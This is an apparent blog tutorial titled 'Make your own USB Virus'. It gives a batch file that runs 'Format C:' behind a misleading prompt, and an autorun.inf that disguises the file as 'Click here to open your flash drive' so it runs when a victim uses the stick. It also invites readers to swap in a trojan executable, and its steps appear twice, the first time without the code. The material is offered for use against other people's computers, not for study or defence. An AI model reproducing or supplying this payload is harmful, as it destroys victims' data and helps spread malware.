Make your own USB Virus
Welcome Back Computerlearningz viewer Today I am going to share how to make your own USB virus
Step 1: Format your USB Stick
Step 2: Open Notepad and put in the following...
Save this as XXX.bat to the root of your USB Stick.
Step 3: Open Notepad again and put in the following...
^^^Save this as autorun.inf
*Make sure you take out the () when you put in your icons name, and you have to save the icon you have on the root of the USB Stick.*
Step 4: You are done! Fell free to change it up a little, you can make XXX.bat load up an .exe, so if you have a trojan that is .exe then you can make it load that, make it load that, make sure that you include where it is loading the file from.
Step 5: To use your USB Stick plug it in to any computer and run your autorun file. The USB Stick should format the C: drive threrfore deleting all files.
Thank you!
Step 1: Format your USB Stick
Step 2: Open Notepad and put in the following...
@echo off
title Delete C:\
cls
echo Are you sure you want to delete all your files? (y/n)
pause>nul
echo Deleting files......
Format C:
Save this as XXX.bat to the root of your USB Stick.
Step 3: Open Notepad again and put in the following...
[autorun]
icon=(name of your icon).ico
open=XXX.bat
action=Click here to open your flash drive.
shell\open\command=XXX.bat
^^^Save this as autorun.inf
*Make sure you take out the () when you put in your icons name, and you have to save the icon you have on the root of the USB Stick.*
Step 4: You are done! Fell free to change it up a little, you can make XXX.bat load up an .exe, so if you have a trojan that is .exe then you can make it load that, make it load that, make sure that you include where it is loading the file from.
Step 5: To use your USB Stick plug it in to any computer and run your autorun file. The USB Stick should format the C: drive threrfore deleting all files.
Thank you!
Comments
Post a Comment